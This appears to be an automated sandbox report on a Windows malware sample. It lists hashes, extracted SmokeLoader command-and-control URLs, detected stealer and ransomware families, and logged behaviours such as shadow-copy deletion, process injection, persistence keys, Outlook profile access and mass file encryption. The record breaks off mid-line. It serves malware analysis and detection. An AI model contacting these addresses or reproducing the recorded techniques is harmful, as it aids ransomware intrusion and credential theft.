Analysis
-
max time kernel
78s -
max time network
131s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
23-09-2023 20:50
Static task
static1
Behavioral task
behavioral1
Sample
65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
Resource
win10v2004-20230915-en
General
-
Target
65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe
-
Size
1.9MB
-
MD5
1b87684768db892932be3f0661c54251
-
SHA1
e5acdb93f6eb75656c9a8242e21b01bf978dc7cf
-
SHA256
65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636
-
SHA512
0fc3cc6ed99e45a3d1ca7cd2dd4d7bfc2f5f11ee7cf0e3d58bfbb4db26f16599cae45b96fc032cd6a050c1ea70bfd02291537088168dd149eee85b38d2527a82
-
SSDEEP
24576:jx4Ul0rrIOGz9I6U7AeyGvHynlLghECQl4L529dktxtPCv1ri+J/ac//zWOYopmB:mUl0/2kHW8ECQl4wi+snopp2vQ
Malware Config
Extracted
smokeloader
2022
http://servermlogs27.xyz/statweb255/
http://servmblog45.xyz/statweb255/
http://demblog575.xyz/statweb255/
http://admlogs85x.xyz/statweb255/
http://blogmstat389.xyz/statweb255/
http://blogmstat255.xyz/statweb255/
Signatures
-
Ammyy Admin
Remote admin tool with various capabilities.
-
AmmyyAdmin payload 2 IoCs
resource yara_rule behavioral1/files/0x00060000000232c2-7546.dat family_ammyyadmin behavioral1/files/0x00060000000232c2-7877.dat family_ammyyadmin -
Detect rhadamanthys stealer shellcode 6 IoCs
resource yara_rule behavioral1/memory/4256-15-0x0000000002DD0000-0x00000000031D0000-memory.dmp family_rhadamanthys behavioral1/memory/4256-16-0x0000000002DD0000-0x00000000031D0000-memory.dmp family_rhadamanthys behavioral1/memory/4256-14-0x0000000002DD0000-0x00000000031D0000-memory.dmp family_rhadamanthys behavioral1/memory/4256-17-0x0000000002DD0000-0x00000000031D0000-memory.dmp family_rhadamanthys behavioral1/memory/4256-27-0x0000000002DD0000-0x00000000031D0000-memory.dmp family_rhadamanthys behavioral1/memory/4256-29-0x0000000002DD0000-0x00000000031D0000-memory.dmp family_rhadamanthys -
FlawedAmmyy RAT
Remote-access trojan based on leaked code for the Ammyy remote admin software.
-
Phemedrone
An information and wallet stealer written in C#.
-
Phobos
Phobos ransomware appeared at the beginning of 2019.
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4256 created 3196 4256 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe 50 -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2516 bcdedit.exe 1348 bcdedit.exe -
Renames multiple (251) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 276 wbadmin.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs 2 IoCs
pid Process 3320 netsh.exe 4392 netsh.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation 781D.exe Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation 75DA.exe -
Drops startup file 1 IoCs
description ioc Process File created \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\n6)ZqKc3{.exe n6)ZqKc3{.exe -
Executes dropped EXE 16 IoCs
pid Process 1508 n6)ZqKc3{.exe 3176 pZW}X.exe 3548 n6)ZqKc3{.exe 212 pZW}X.exe 1516 n6)ZqKc3{.exe 2184 n6)ZqKc3{.exe 3756 6E45.exe 1080 705A.exe 4576 6E45.exe 4004 6E45.exe 5000 73A6.exe 5092 75DA.exe 4480 781D.exe 548 8405.exe 3604 Ynigope.exe 4452 Ynigope.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 12 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook certreq.exe Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook certreq.exe Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook certreq.exe Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook certreq.exe Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook certreq.exe Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook certreq.exe Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key opened \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\n6)ZqKc3{ = "C:\\Users\\Admin\\AppData\\Local\\n6)ZqKc3{.exe" n6)ZqKc3{.exe Set value (str) \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\n6)ZqKc3{ = "C:\\Users\\Admin\\AppData\\Local\\n6)ZqKc3{.exe" n6)ZqKc3{.exe -
Drops desktop.ini file(s) 4 IoCs
description ioc Process File opened for modification C:\$Recycle.Bin\S-1-5-21-919254492-3979293997-764407192-1000\desktop.ini n6)ZqKc3{.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-919254492-3979293997-764407192-1000\desktop.ini n6)ZqKc3{.exe File opened for modification C:\Program Files\desktop.ini n6)ZqKc3{.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI n6)ZqKc3{.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 99 ip-api.com -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 3796 set thread context of 4256 3796 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe 87 PID 3176 set thread context of 212 3176 pZW}X.exe 103 PID 1508 set thread context of 3548 1508 n6)ZqKc3{.exe 104 PID 1516 set thread context of 2184 1516 n6)ZqKc3{.exe 107 PID 3756 set thread context of 4004 3756 6E45.exe 127 PID 5000 set thread context of 4156 5000 73A6.exe 133 PID 5092 set thread context of 2888 5092 75DA.exe 139 PID 4480 set thread context of 3816 4480 781D.exe 138 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_SubTest-ppd.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-heapdump.xml.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File created C:\Program Files\Microsoft Office\root\Licenses16\AccessVL_MAK-ul-oob.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp-ul-oob.xrm-ms n6)ZqKc3{.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-io_zh_CN.jar.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-80.png n6)ZqKc3{.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base_heb.xml n6)ZqKc3{.exe File opened for modification C:\Program Files\Common Files\microsoft shared\OFFICE16\Office Setup Controller\pkeyconfig.companion.dll n6)ZqKc3{.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\it-IT\sqlxmlx.rll.mui n6)ZqKc3{.exe File created C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-white_scale-100.png.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL115.XML n6)ZqKc3{.exe File created C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.sr-latn-rs.dll.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File opened for modification C:\Program Files\Common Files\microsoft shared\MSInfo\it-IT\msinfo32.exe.mui n6)ZqKc3{.exe File created C:\Program Files\Java\jre1.8.0_66\bin\awt.dll.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX40.exe.config n6)ZqKc3{.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\AirSpace.Etw.man.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\javafx-mx.jar n6)ZqKc3{.exe File created C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\win32_CopyNoDrop32x32.gif.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File created C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial2-ppd.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019VL_KMS_Client_AE-ul-oob.xrm-ms n6)ZqKc3{.exe File created C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkClientCP.bat.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.docs.zh_CN_5.5.0.165303.jar n6)ZqKc3{.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.property_1.4.200.v20140214-0004.jar n6)ZqKc3{.exe File opened for modification C:\Program Files\7-Zip\Lang\va.txt n6)ZqKc3{.exe File created C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Retail-ul-oob.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Grace-ul-oob.xrm-ms n6)ZqKc3{.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\StandardR_Trial-ul-oob.xrm-ms n6)ZqKc3{.exe File created C:\Program Files\Microsoft Office\root\vfs\Fonts\private\CENTURY.TTF.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File opened for modification C:\Program Files\7-Zip\Lang\si.txt n6)ZqKc3{.exe File created C:\Program Files\Java\jdk1.8.0_66\bin\serialver.exe.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\org-openide-modules_zh_CN.jar.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar n6)ZqKc3{.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_zh_CN.jar.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\OSFROAMINGPROXY.DLL n6)ZqKc3{.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\msvcp120.dll n6)ZqKc3{.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_ja.jar.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdCO365R_SubTest-ppd.xrm-ms n6)ZqKc3{.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] n6)ZqKc3{.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\plugin2\msvcr100.dll n6)ZqKc3{.exe File created C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_OEM_Perp-ul-oob.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected][4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_ja.jar.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File created C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Smokey Glass.eftx.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File created C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Trial-ul-oob.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_OEM_Perp-ul-phn.xrm-ms n6)ZqKc3{.exe File created C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_Subscription-ul-oob.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdCO365R_SubTrial-ppd.xrm-ms n6)ZqKc3{.exe File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Spatial.NetFX35.dll.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\api-ms-win-crt-convert-l1-1-0.dll n6)ZqKc3{.exe File created C:\Program Files\Java\jdk1.8.0_66\db\bin\ij.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png n6)ZqKc3{.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_zh_CN.jar n6)ZqKc3{.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProMSDNR_Retail-pl.xrm-ms n6)ZqKc3{.exe File created C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\linesstylish.dotx.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\api-ms-win-core-timezone-l1-1-0.dll n6)ZqKc3{.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_zh_4.4.0.v20140623020002.jar.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_ja.jar n6)ZqKc3{.exe File created C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_Trial-pl.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\vccorlib140.dll n6)ZqKc3{.exe File opened for modification C:\Program Files\Microsoft Office\root\Client\msvcr120.dll n6)ZqKc3{.exe File created C:\Program Files\Microsoft Office\root\Licenses16\MondoR_O16ConsumerPerp_Bypass30-ppd.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File created C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial5-pl.xrm-ms.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_ja.jar.id[4FB2A4D5-3483].[[email protected]].8base n6)ZqKc3{.exe File opened for modification C:\Program Files\Microsoft Office\root\Client\api-ms-win-core-file-l1-2-0.dll n6)ZqKc3{.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 3860 548 WerFault.exe 132 4988 548 WerFault.exe 132 -
Checks SCSI registry key(s) 3 TTPs 7 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pZW}X.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pZW}X.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pZW}X.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 certreq.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString certreq.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3740 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3796 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe 3796 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe 3796 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe 4256 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe 4256 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe 4256 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe 4256 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe 4796 certreq.exe 4796 certreq.exe 4796 certreq.exe 4796 certreq.exe 1508 n6)ZqKc3{.exe 3176 pZW}X.exe 212 pZW}X.exe 212 pZW}X.exe 1516 n6)ZqKc3{.exe 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3548 n6)ZqKc3{.exe 3548 n6)ZqKc3{.exe 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3548 n6)ZqKc3{.exe 3548 n6)ZqKc3{.exe 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE -
Suspicious behavior: MapViewOfSection 11 IoCs
pid Process 212 pZW}X.exe 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE 3196 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3796 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe Token: SeDebugPrivilege 1508 n6)ZqKc3{.exe Token: SeDebugPrivilege 3176 pZW}X.exe Token: SeDebugPrivilege 1516 n6)ZqKc3{.exe Token: SeDebugPrivilege 3548 n6)ZqKc3{.exe Token: SeBackupPrivilege 3664 vssvc.exe Token: SeRestorePrivilege 3664 vssvc.exe Token: SeAuditPrivilege 3664 vssvc.exe Token: SeIncreaseQuotaPrivilege 3716 WMIC.exe Token: SeSecurityPrivilege 3716 WMIC.exe Token: SeTakeOwnershipPrivilege 3716 WMIC.exe Token: SeLoadDriverPrivilege 3716 WMIC.exe Token: SeSystemProfilePrivilege 3716 WMIC.exe Token: SeSystemtimePrivilege 3716 WMIC.exe Token: SeProfSingleProcessPrivilege 3716 WMIC.exe Token: SeIncBasePriorityPrivilege 3716 WMIC.exe Token: SeCreatePagefilePrivilege 3716 WMIC.exe Token: SeBackupPrivilege 3716 WMIC.exe Token: SeRestorePrivilege 3716 WMIC.exe Token: SeShutdownPrivilege 3716 WMIC.exe Token: SeDebugPrivilege 3716 WMIC.exe Token: SeSystemEnvironmentPrivilege 3716 WMIC.exe Token: SeRemoteShutdownPrivilege 3716 WMIC.exe Token: SeUndockPrivilege 3716 WMIC.exe Token: SeManageVolumePrivilege 3716 WMIC.exe Token: 33 3716 WMIC.exe Token: 34 3716 WMIC.exe Token: 35 3716 WMIC.exe Token: 36 3716 WMIC.exe Token: SeIncreaseQuotaPrivilege 3716 WMIC.exe Token: SeSecurityPrivilege 3716 WMIC.exe Token: SeTakeOwnershipPrivilege 3716 WMIC.exe Token: SeLoadDriverPrivilege 3716 WMIC.exe Token: SeSystemProfilePrivilege 3716 WMIC.exe Token: SeSystemtimePrivilege 3716 WMIC.exe Token: SeProfSingleProcessPrivilege 3716 WMIC.exe Token: SeIncBasePriorityPrivilege 3716 WMIC.exe Token: SeCreatePagefilePrivilege 3716 WMIC.exe Token: SeBackupPrivilege 3716 WMIC.exe Token: SeRestorePrivilege 3716 WMIC.exe Token: SeShutdownPrivilege 3716 WMIC.exe Token: SeDebugPrivilege 3716 WMIC.exe Token: SeSystemEnvironmentPrivilege 3716 WMIC.exe Token: SeRemoteShutdownPrivilege 3716 WMIC.exe Token: SeUndockPrivilege 3716 WMIC.exe Token: SeManageVolumePrivilege 3716 WMIC.exe Token: 33 3716 WMIC.exe Token: 34 3716 WMIC.exe Token: 35 3716 WMIC.exe Token: 36 3716 WMIC.exe Token: SeBackupPrivilege 3736 wbengine.exe Token: SeRestorePrivilege 3736 wbengine.exe Token: SeSecurityPrivilege 3736 wbengine.exe Token: SeShutdownPrivilege 3196 Explorer.EXE Token: SeCreatePagefilePrivilege 3196 Explorer.EXE Token: SeShutdownPrivilege 3196 Explorer.EXE Token: SeCreatePagefilePrivilege 3196 Explorer.EXE Token: SeDebugPrivilege 3756 6E45.exe Token: SeDebugPrivilege 5000 73A6.exe Token: SeDebugPrivilege 5092 75DA.exe Token: SeDebugPrivilege 1080 705A.exe Token: SeDebugPrivilege 4480 781D.exe Token: SeDebugPrivilege 548 explorer.exe Token: SeDebugPrivilege 4156 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3796 wrote to memory of 4148 3796 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe 86 PID 3796 wrote to memory of 4148 3796 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe 86 PID 3796 wrote to memory of 4148 3796 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe 86 PID 3796 wrote to memory of 4256 3796 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe 87 PID 3796 wrote to memory of 4256 3796 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe 87 PID 3796 wrote to memory of 4256 3796 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe 87 PID 3796 wrote to memory of 4256 3796 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe 87 PID 3796 wrote to memory of 4256 3796 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe 87 PID 3796 wrote to memory of 4256 3796 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe 87 PID 3796 wrote to memory of 4256 3796 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe 87 PID 3796 wrote to memory of 4256 3796 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe 87 PID 4256 wrote to memory of 4796 4256 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe 95 PID 4256 wrote to memory of 4796 4256 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe 95 PID 4256 wrote to memory of 4796 4256 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe 95 PID 4256 wrote to memory of 4796 4256 65fcd66d75c64db0f8b7819431d77f83a421e9fd210ff6bdf74c47e7a4c39636.exe 95 PID 3176 wrote to memory of 212 3176 pZW}X.exe 103 PID 3176 wrote to memory of 212 3176 pZW}X.exe 103 PID 3176 wrote to memory of 212 3176 pZW}X.exe 103 PID 3176 wrote to memory of 212 3176 pZW}X.exe 103 PID 3176 wrote to memory of 212 3176 pZW}X.exe 103 PID 3176 wrote to memory of 212 3176 pZW}X.exe 103 PID 1508 wrote to memory of 3548 1508 n6)ZqKc3{.exe 104 PID 1508 wrote to memory of 3548 1508 n6)ZqKc3{.exe 104 PID 1508 wrote to memory of 3548 1508 n6)ZqKc3{.exe 104 PID 1508 wrote to memory of 3548 1508 n6)ZqKc3{.exe 104 PID 1508 wrote to memory of 3548 1508 n6)ZqKc3{.exe 104 PID 1508 wrote to memory of 3548 1508 n6)ZqKc3{.exe 104 PID 1508 wrote to memory of 3548 1508 n6)ZqKc3{.exe 104 PID 1508 wrote to memory of 3548 1508 n6)ZqKc3{.exe 104 PID 1508 wrote to memory of 3548 1508 n6)ZqKc3{.exe 104 PID 1508 wrote to memory of 3548 1508 n6)ZqKc3{.exe 104 PID 1516 wrote to memory of 2184 1516 n6)ZqKc3{.exe 107 PID 1516 wrote to memory of 2184 1516 n6)ZqKc3{.exe 107 PID 1516 wrote to memory of 2184 1516 n6)ZqKc3{.exe 107 PID 1516 wrote to memory of 2184 1516 n6)ZqKc3{.exe 107 PID 1516 wrote to memory of 2184 1516 n6)ZqKc3{.exe 107 PID 1516 wrote to memory of 2184 1516 n6)ZqKc3{.exe 107 PID 1516 wrote to memory of 2184 1516 n6)ZqKc3{.exe 107 PID 1516 wrote to memory of 2184 1516 n6)ZqKc3{.exe 107 PID 1516 wrote to memory of 2184 1516 n6)ZqKc3{.exe 107 PID 1516 wrote to memory of 2184 1516 n6)ZqKc3{.exe 107 PID 3548 wrote to memory of 2880 